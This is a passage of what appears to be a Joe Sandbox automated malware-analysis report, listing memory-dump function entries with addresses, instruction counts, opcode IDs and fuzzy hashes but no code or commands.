                                                                                                                                            • Instruction Fuzzy Hash: 0831923090C65E8FEB94EF2894513B977E2EFA9381F04017AE40DD32D2DF296C558781
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10820 Relevance: .1, Instructions: 108COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fbfb8853895adaeceabb83ef44bf70b45ee13f2f319995cb353cc0632238a885
                                                                                                                                            • Instruction ID: 2db9552041e4060e59e756070a42de0ee0b8f314742fd478fdb92ae2ada59ec3
                                                                                                                                            • Opcode Fuzzy Hash: fbfb8853895adaeceabb83ef44bf70b45ee13f2f319995cb353cc0632238a885
                                                                                                                                            • Instruction Fuzzy Hash: B7319566D0E5E29EF691733D24612F42BD0EF927A5F2901B7C48C8A1C3DE1C6C4643E9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F154F0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c066382e4dda69dbfb224fd06e05decfebd0228c9d10d3704c9183e97392cb8e
                                                                                                                                            • Instruction ID: e34bf50d54378ac3cd13da13c0772c301dacf36162cd1c01dd73400ce49f1019
                                                                                                                                            • Opcode Fuzzy Hash: c066382e4dda69dbfb224fd06e05decfebd0228c9d10d3704c9183e97392cb8e
                                                                                                                                            • Instruction Fuzzy Hash: 6431CF31E0C94A8FEB88EF2898556A97BE1FF5D740F0400AAD00DE72D2CF286C418749
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F153A9 Relevance: .1, Instructions: 93COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 66ae7ac99fe3af1618d3ce1d8ab6b50505a291c6a6346a2256790e59874a35ee
                                                                                                                                            • Instruction ID: f695aa6afb2500a79b2204017f3a9c91d4906ae6edfe423e482d6c0274effdb4
                                                                                                                                            • Opcode Fuzzy Hash: 66ae7ac99fe3af1618d3ce1d8ab6b50505a291c6a6346a2256790e59874a35ee
                                                                                                                                            • Instruction Fuzzy Hash: 75210731A0D7960FF315626878653B63BD1EB853A1F0801AFE889C71E3DEA96C45C345
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F161F8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cc602b484da63fc85b7b2802bbf6c63432386be75e26aec2f6a539ac9d858bec
                                                                                                                                            • Instruction ID: 964287fd0039c13690a57673ede14d0b7369f94f83e93ba77471fc22498596f8
                                                                                                                                            • Opcode Fuzzy Hash: cc602b484da63fc85b7b2802bbf6c63432386be75e26aec2f6a539ac9d858bec
                                                                                                                                            • Instruction Fuzzy Hash: 4F21CF31A0DD0A5FE788FB18D4846B6B3E2FBA8354F10463AD44EC3285CF3AE9418780
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F152BF Relevance: .1, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f0d3134f8061e002728f5ad479bcbef54c318e03b60992998ff80ec081ef83c4
                                                                                                                                            • Instruction ID: 8096299e000be918f379100c206acb4bbc20e0fdd5359b281fc3edc877cb8944
                                                                                                                                            • Opcode Fuzzy Hash: f0d3134f8061e002728f5ad479bcbef54c318e03b60992998ff80ec081ef83c4
                                                                                                                                            • Instruction Fuzzy Hash: DE21D732B0CB468FE78DEB2CA4155B5B7D1EF99361B1540BAC00DC7293DE28AC828754
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1B810 Relevance: .1, Instructions: 86COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0837271e6c043d6d3428e3481d8e8ca35dbf3808b78fbb6dca29f95719b0138b
                                                                                                                                            • Instruction ID: 7134fa8689409f1a14529c8ad793aaf09b08da3cfac2b530e72cd4b2be0817d2
                                                                                                                                            • Opcode Fuzzy Hash: 0837271e6c043d6d3428e3481d8e8ca35dbf3808b78fbb6dca29f95719b0138b
                                                                                                                                            • Instruction Fuzzy Hash: 3B210131A2E94B8FE795F77844156A57BE2EFA9380F1840B9D08CC72C6DF28EC028744
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1DAD9 Relevance: .1, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d84cd2d4952f8232ec5d775d24cc750f9b89aca9a3cb34ad4a250a54b8f196a8
                                                                                                                                            • Instruction ID: 89f6e763b00ab68a1f2fd5f48c073d935930921d9b443042ca7b657ccaeecf34
                                                                                                                                            • Opcode Fuzzy Hash: d84cd2d4952f8232ec5d775d24cc750f9b89aca9a3cb34ad4a250a54b8f196a8
                                                                                                                                            • Instruction Fuzzy Hash: 0321E23190E7C65FD356F73498216A5BBB1EF82290F0941FAE449CB0C7EF1CA9498361
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1F76B Relevance: .1, Instructions: 82COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d33c5b3e73898ed2e04c58cecdfab2149770e9a57656f20f2467e9e49414d272
                                                                                                                                            • Instruction ID: aba1328572b26f5453aab9c658bbf72e93e616c00e4b543ebd4b6c011392065d
                                                                                                                                            • Opcode Fuzzy Hash: d33c5b3e73898ed2e04c58cecdfab2149770e9a57656f20f2467e9e49414d272
                                                                                                                                            • Instruction Fuzzy Hash: C2218EB0E1964A8FE788EF2884552A9B7E1FF89354F5002B9D54CD71D2DF381D818B19
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F14578 Relevance: .1, Instructions: 71COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1523254c2b7e5f279ae532e63856c9ae22ac01a34484d6da29bbef7b3a13ec46
                                                                                                                                            • Instruction ID: ea87533f1c3a93350a0dc591704594a902069952781f5dd99614a46d436884c7
                                                                                                                                            • Opcode Fuzzy Hash: 1523254c2b7e5f279ae532e63856c9ae22ac01a34484d6da29bbef7b3a13ec46
                                                                                                                                            • Instruction Fuzzy Hash: 5B11CC3290C9894FD311FB24D8214E67BA5EFD6350F0401BBD01DC71D2DA585D87C790
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F12C50 Relevance: .1, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 95924ca3a784105a186acd5e67145e524ba98e6fd3de6889e62f3eb877b82ef9
                                                                                                                                            • Instruction ID: 66673388dd39efe7696bd22ba46f59a3f1cfb58d7d8fb73560cd1e8da22ad7ff
                                                                                                                                            • Opcode Fuzzy Hash: 95924ca3a784105a186acd5e67145e524ba98e6fd3de6889e62f3eb877b82ef9
                                                                                                                                            • Instruction Fuzzy Hash: 1501D135B1CA260FF264615D78553B676C1FB883B2F04017FE94DC31D1ED696C4551C5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF8490005C6 Relevance: .1, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2184796368.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849000000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1e7d7c010ebe69b00a606e8ad05d49581442b3a41459bff7eaab6e304115676a
                                                                                                                                            • Instruction ID: 0ed9da8b37786a3aacb1a4fa433f15d8a4a9039ce664159c26a5c6d427a7de4b
                                                                                                                                            • Opcode Fuzzy Hash: 1e7d7c010ebe69b00a606e8ad05d49581442b3a41459bff7eaab6e304115676a
                                                                                                                                            • Instruction Fuzzy Hash: 0E11E67280E6C91FE759FB28AC565F97B60EF52264F0400FEE08E87193E90A2845C362
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10745 Relevance: .1, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b02d49c02092a75c259882fb2c4b947972c36a003f3804077c4bf72a735c612e
                                                                                                                                            • Instruction ID: 28a8a911aa13b4740645c69d3e1dd467528fee70dc98ad93febe0c8f6e1a63b9
                                                                                                                                            • Opcode Fuzzy Hash: b02d49c02092a75c259882fb2c4b947972c36a003f3804077c4bf72a735c612e
                                                                                                                                            • Instruction Fuzzy Hash: 34112530A0CA090FEB94FB2C984A576B7C5EBE8390F14093ED40EC36E1CE25AC418340
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1E5FA Relevance: .1, Instructions: 62COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e4e8791255c04d98c822f7aeb99c59cab06b9e8b546166a64763bf5df4f6eea9
                                                                                                                                            • Instruction ID: 67c800a8aa6014feb7f3ce809439898f6fe383bad14ec4bae0e008dd89308642
                                                                                                                                            • Opcode Fuzzy Hash: e4e8791255c04d98c822f7aeb99c59cab06b9e8b546166a64763bf5df4f6eea9
                                                                                                                                            • Instruction Fuzzy Hash: 4C117062D1E6D54FE346B37858691A57FA0EF52698B0D41FBD084CB0D3E90858498356
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F14E65 Relevance: .1, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 99b2b9e42da714fd0a4f20aacd4d710e8d0a0f691976ea5c49754d792b9d5b74
                                                                                                                                            • Instruction ID: 3a138b32f299f049b163899224dfc67f24417fad4ccc51a7cf467084a38fb6fb
                                                                                                                                            • Opcode Fuzzy Hash: 99b2b9e42da714fd0a4f20aacd4d710e8d0a0f691976ea5c49754d792b9d5b74
                                                                                                                                            • Instruction Fuzzy Hash: 76113C31D1890D8FDB84EF98C0926ED7BB2FFA8351F5040AAD519E3292C735AD95CB84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10FF5 Relevance: .1, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f1848e17ace66da85fe316df2296ccddaeb044dd731ac4df6af58604f78407c5
                                                                                                                                            • Instruction ID: 11521db81f09fe8cd5b037ffefd041f25dfc487615773d42f192b660d481e137
                                                                                                                                            • Opcode Fuzzy Hash: f1848e17ace66da85fe316df2296ccddaeb044dd731ac4df6af58604f78407c5
                                                                                                                                            • Instruction Fuzzy Hash: E4118272D1EBD94FE356BB3818291A8BFA0FF96751F0900BBD088C71D3DA144C888756
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1411D Relevance: .1, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ac61e5f68faec1c47897c6bcb8ee43ed23fa69e2a410284e6c52378709e2a1dd
                                                                                                                                            • Instruction ID: 2c8bf798853dab04b632722bfafe99397e518cea6c70b3bd3cbe9d92be900209
                                                                                                                                            • Opcode Fuzzy Hash: ac61e5f68faec1c47897c6bcb8ee43ed23fa69e2a410284e6c52378709e2a1dd
                                                                                                                                            • Instruction Fuzzy Hash: 6211A53194EA4A4FC796EB2894356587BA2FFB5350F5A41FAC009CB1D3DB1EEC018741
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F108F5 Relevance: .1, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 05b4cdc90c60b1ee62f904bae7dfe024f389a2f5d747dafdb7a08ecf767340e6
                                                                                                                                            • Instruction ID: 564a281562e2452d00930dd5ff13b66843f9b41b8783dd94a8706e8ec09086eb
                                                                                                                                            • Opcode Fuzzy Hash: 05b4cdc90c60b1ee62f904bae7dfe024f389a2f5d747dafdb7a08ecf767340e6
                                                                                                                                            • Instruction Fuzzy Hash: 9201D472D0C91C4FEB50FF78845A1FD7BF1EF58341F8101AAD408D7296DA28A9048B85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1E050 Relevance: .1, Instructions: 52COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 02a66740eb8a5e72647fb80c19730f90dc993ad3f8235596d92c42028d47f150
                                                                                                                                            • Instruction ID: 151ad70f01500352af0768141df9248cd2852d070fc6609d5436ea0fc06011ad
                                                                                                                                            • Opcode Fuzzy Hash: 02a66740eb8a5e72647fb80c19730f90dc993ad3f8235596d92c42028d47f150
                                                                                                                                            • Instruction Fuzzy Hash: C0018131E0DD1B8FD79AA72C641067173D1EB99B90F4505B9C40CC72D9EE2DDC428780
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10490 Relevance: .1, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 80e9ce7e3943bb1698803d080b11405a48b8287725aa5cd7681eef68f4fd9756
                                                                                                                                            • Instruction ID: e088a68ab27445063e40fb98ea0c8bb9bd07d58f7eaf4c59c47acebf11c48cc2
                                                                                                                                            • Opcode Fuzzy Hash: 80e9ce7e3943bb1698803d080b11405a48b8287725aa5cd7681eef68f4fd9756
                                                                                                                                            • Instruction Fuzzy Hash: D6011B30D0891E9FDB44EF88D0816EE77B2EB98344F1081AAD519E3285CB35AD918B84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10708 Relevance: .1, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8f26e7e41f2fa189097216bf40e701161db2fb74da077cfdd397a501e485a5f3
                                                                                                                                            • Instruction ID: a9b0bc5f73703ecbdf8607a5dcfe49111cbe2de95f2c85e09978b98d3feddcc0
                                                                                                                                            • Opcode Fuzzy Hash: 8f26e7e41f2fa189097216bf40e701161db2fb74da077cfdd397a501e485a5f3
                                                                                                                                            • Instruction Fuzzy Hash: F0014431A1DC0B1EDA95FB2C5015A79A2D2FFE8390F654079D40DD71C5DE29EC414744
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1453B Relevance: .0, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 41f8167c094d3d5cf6cabc39f44cb5a4df0585cebc54ce311f7454c561b7464b
                                                                                                                                            • Instruction ID: 363587ed3c0cd0a43f4002f7afa680abbe19549ce05c745f36c310fa72914465
                                                                                                                                            • Opcode Fuzzy Hash: 41f8167c094d3d5cf6cabc39f44cb5a4df0585cebc54ce311f7454c561b7464b
                                                                                                                                            • Instruction Fuzzy Hash: E1F0FF32E0C91E8BEB50EA68E8114A87BA1EBD9364F04006AE00CC31D1EA6A4845C205
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F14D19 Relevance: .0, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0912b08446e87f466e24026cb3ebd67b1240acb1387de413e48ecec72eee8fd7
                                                                                                                                            • Instruction ID: 670ae7e939ba77cee68efbf2bc738497e9e3977662288294059b070c5a7ceaf7
                                                                                                                                            • Opcode Fuzzy Hash: 0912b08446e87f466e24026cb3ebd67b1240acb1387de413e48ecec72eee8fd7
                                                                                                                                            • Instruction Fuzzy Hash: CC01A271A4E7CA0FEB46AB7444252AA7FB0EF57380F4500F6D109CB197EE6D8D458312
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1BFF9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2b0d0cf408e1762ae313199fe8fafaaba69ef34713aa2edad3da6722a047ef8b
                                                                                                                                            • Instruction ID: f2cbc368ca2836a3cb64a539411f310dedc3aa40d46fba10aacf9e1e27105917
                                                                                                                                            • Opcode Fuzzy Hash: 2b0d0cf408e1762ae313199fe8fafaaba69ef34713aa2edad3da6722a047ef8b
                                                                                                                                            • Instruction Fuzzy Hash: 5501697092DA8E8FDB46EF2888681B97FB0FF59340F4904ABE458C32A2DE7959148741
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10A2D Relevance: .0, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 97890bcbe367a9724a5fbe16abd1053734094ba8fde1e83c7c866c24611aac19
                                                                                                                                            • Instruction ID: 3133a67073871b94e8fcb0dcf59ffebdf836576ff749d374658d10cf60c14f40
                                                                                                                                            • Opcode Fuzzy Hash: 97890bcbe367a9724a5fbe16abd1053734094ba8fde1e83c7c866c24611aac19
                                                                                                                                            • Instruction Fuzzy Hash: 7CF08C30919A8A5FEB42EB7884951A9BFF0EF56280B8500E2D448CA193E979598A8711
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10740 Relevance: .0, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d936fd8b7f21f8b496725b9834a906ae03ccc755ae8ee6128bac52da22e3fb96
                                                                                                                                            • Instruction ID: 648bed30a81ed75858e4589da731dfddfa0865bb36a74ca76aad31ce9b64fdcc
                                                                                                                                            • Opcode Fuzzy Hash: d936fd8b7f21f8b496725b9834a906ae03ccc755ae8ee6128bac52da22e3fb96
                                                                                                                                            • Instruction Fuzzy Hash: 5CF0E561F1C80D49E6B8EB2D68A473402C3EFD87A1F580179D80DC21C5DE0C9C820258
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10A89 Relevance: .0, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
